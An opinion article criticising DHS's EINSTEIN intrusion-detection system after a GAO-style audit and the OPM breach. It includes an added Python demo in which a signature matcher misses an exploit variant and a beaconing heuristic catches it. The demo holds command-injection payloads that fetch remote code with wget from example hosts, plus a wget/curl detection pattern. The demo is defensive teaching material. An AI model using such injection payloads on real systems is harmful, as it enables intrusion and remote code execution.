By Steve King, LifeZette:
Federal agencies remain extremely vulnerable cyber targets two years after OPM breach
According to a sanitized version of a secret federal audit, the network intrusion-detection and prevention system operated by the Department of Homeland Security, meant to detect and prevent nation-state attacks, is completely ineffective. The audit found that the federal government’s primary perimeter defense system, known as EINSTEIN, depends only on known patterns of attack (signature detection) to spot suspicious traffic, had no signatures covering 94 percent of the commonly known vulnerabilities the auditors checked, and does not even inspect web traffic for malicious content.
In addition, the audit discovered that the prevention feature of the system is deployed at only five of the 23 major nondefense agencies, one of which was the Office of Personnel Management.
The auditors’ findings included the conclusion that the $6 billion DHS system does not combat hackers, nor “should it be relied on to provide effective cybersecurity-related support to federal agencies.” They went on to say that “the overall intent of the system was to protect against nation-state level threat actors,” yet EINSTEIN missed the so-called advanced persistent threats they tested, the kind of long-running campaign commonly run by nation-state actors.
EINSTEIN “did not possess intrusion-detection signatures that fully addressed all the advanced persistent threats we reviewed,” the authors of the audit said.
The zero-day attack that blew through EINSTEIN’s defenses at the Office of Personnel Management in 2015 is a classic example of the type of attack that our current federal government defenses cannot handle. News flash: zero-day attacks are the attacks the private sector worries about most today. Attacks that can be matched against a known signature are already handled by any number of commercial cybersecurity products. Someone at DHS might want to look outside the confines of the Washington swamp.
Most of today’s advanced cyber-attacks hide inside ordinary-looking network flows and cannot be seen by EINSTEIN, because the system instead relies on manual intervention: a signature is written and added only after a malicious attempt has been unearthed somewhere. A purely signature-based sensor can, by construction, match only what has already been described to it, so this cave-dwelling approach guarantees that a genuinely new attack will always succeed against our national cyber defense system the first time it is used.
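To make the two findings above concrete (signatures that cover only a fraction of the vulnerability catalogue, and a sensor that cannot see an attack until someone has written a pattern for it), here is a small signature engine run over constructed traffic. This is an added example and is not code from the article, from DHS or from EINSTEIN; the signatures, the CVE-style labels, the hosts and the payloads are all invented for illustration. The variant exploit is functionally the same as the one the sensor knows, but written so that the existing pattern does not fire, which is exactly what a new attack looks like to a signature-only system. A flow-based heuristic (regularly spaced connections, a common command-and-control beacon pattern) is included as the contrast: it flags the same traffic without knowing anything about the payload.

```python
"""Signature-only detection versus an unseen variant, on constructed traffic.

Added example, not part of the LifeZette article or of any DHS system. Every
signature, CVE-style identifier (used only as an opaque label), address and
payload below is invented for illustration.
"""
import re
import statistics
from dataclasses import dataclass, field


@dataclass
class Signature:
    """A Snort-style content rule: a regex over the payload plus the vulnerabilities it claims to cover."""
    name: str
    pattern: re.Pattern
    cves: frozenset = field(default_factory=frozenset)


@dataclass
class Conversation:
    """Traffic between one src/dst pair: a representative payload and the connection start times (seconds)."""
    src: str
    dst: str
    payload: bytes
    timestamps: list


# Constructed signature set: the kind of rule a signature-based sensor ships with.
SIGNATURES = [
    Signature("php-cmd-injection-v1", re.compile(rb"cmd=;(?:wget|curl)\s"), frozenset({"CVE-0000-0001"})),
    Signature("known-c2-uri", re.compile(rb"GET /update\.php\?id=[0-9a-f]{16} "), frozenset()),
]

# Constructed vulnerability catalogue: what the defender would want signatures for.
VULN_DB = frozenset({"CVE-0000-0001", "CVE-0000-0002", "CVE-0000-0003", "CVE-0000-0004"})


def match_signatures(conversations, signatures=SIGNATURES):
    """Return (conversation index, signature name) for every payload matching a known pattern."""
    alerts = []
    for i, conv in enumerate(conversations):
        for sig in signatures:
            if sig.pattern.search(conv.payload):
                alerts.append((i, sig.name))
    return alerts


def signature_coverage(signatures=SIGNATURES, vuln_db=VULN_DB):
    """Fraction of catalogued vulnerabilities that at least one signature claims to address."""
    covered = frozenset().union(*(s.cves for s in signatures)) & vuln_db
    return len(covered) / len(vuln_db)


def beaconing(conversations, min_connections=6, max_jitter=0.1):
    """Flow-based heuristic: flag src/dst pairs that reconnect at near-constant intervals.

    Needs no payload knowledge, so it can surface a command-and-control channel
    for which no signature exists yet. Jitter is the coefficient of variation of the gaps.
    """
    flagged = []
    for i, conv in enumerate(conversations):
        if len(conv.timestamps) < min_connections:
            continue
        gaps = [b - a for a, b in zip(conv.timestamps, conv.timestamps[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            flagged.append(i)
    return flagged


# Constructed traffic: a benign request; an exploit the signature set knows; and a
# functionally identical exploit (full path to wget instead of the bare command) that
# no rule matches and that then beacons to its server roughly every 60 seconds.
CONVERSATIONS = [
    Conversation("10.0.0.5", "10.0.0.80", b"GET /index.php?page=home HTTP/1.1\r\n", [0.0]),
    Conversation("203.0.113.9", "10.0.0.80", b"GET /x.php?cmd=;wget http://203.0.113.9/a HTTP/1.1\r\n", [5.0]),
    Conversation("198.51.100.7", "10.0.0.80", b"GET /x.php?cmd=;/usr/bin/wget http://198.51.100.7/a HTTP/1.1\r\n",
                 [100.0, 160.1, 219.9, 280.2, 339.8, 400.0, 460.1]),
]

if __name__ == "__main__":
    print("signature alerts:", match_signatures(CONVERSATIONS))      # only the known variant
    print("vulnerability coverage: %.0f%%" % (100 * signature_coverage()))
    print("beaconing conversations:", beaconing(CONVERSATIONS))     # the unseen variant
```

Running it, the signature engine reports only the exploit it has a rule for, the coverage figure shows how little of the catalogue the rules address (the audit's 94 percent gap is the same computation over real data), and the beacon heuristic flags the variant the signatures missed. The heuristic is deliberately simple and will need tuning against real traffic, but it demonstrates the point: detection that does not depend on a pre-written pattern is what a signature-only design lacks.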
To make matters worse, the Obama administration’s vaunted information-sharing initiatives are now found to be essentially worthless, according to GAO officials. The IT infrastructure at each agency differs, and EINSTEIN apparently must be tailored to each separate environment. One agency complained that EINSTEIN would disrupt its email system.
“DHS’s information-sharing initiatives have met with frequent disagreements among agencies about the number of notifications sent and received and their usefulness,” according to the GAO auditors.
The agencies reported receiving only a quarter of the notifications Homeland Security said it had sent during the audited period, and many of the ones that did reach them served no purpose, according to the audit: of the alerts that were communicated successfully, almost half were too slow, useless, false alarms, or unrelated to intrusion detection.
Meanwhile, as seasoned Washington observers might have guessed, the DHS has created a variety of metrics related to EINSTEIN, but “none provide insight into the value derived from the functions of the system,” the auditors said.
I don’t have to tell anyone reading this that if even a fraction of this incompetence occurred in the private sector, even at a non-profit, heads would roll. It might be understandable to shrug if a government agency screwed up dealing with, say, climate change, but are we really going to ignore this level of dangerous disregard for our national defense? What if our military started to behave like the troops in Stripes or Down Periscope? Would that be funny?
This is not funny. Heads should roll. And this President needs to understand quickly that the vast government under his charge is protected by antiquated technology and failed detection and prevention techniques, surrounded by bureaucrats who make a living covering their own interests while the rest of ours are hung out as targets.
Homeland Security now says it wasn’t required to link the signatures to the vulnerability database, but that it acknowledges the deficiency and plans to address it soon, according to its response to the audit. Soon, but in the future. Sometime. Later. Maybe. Because, you know. They weren’t required.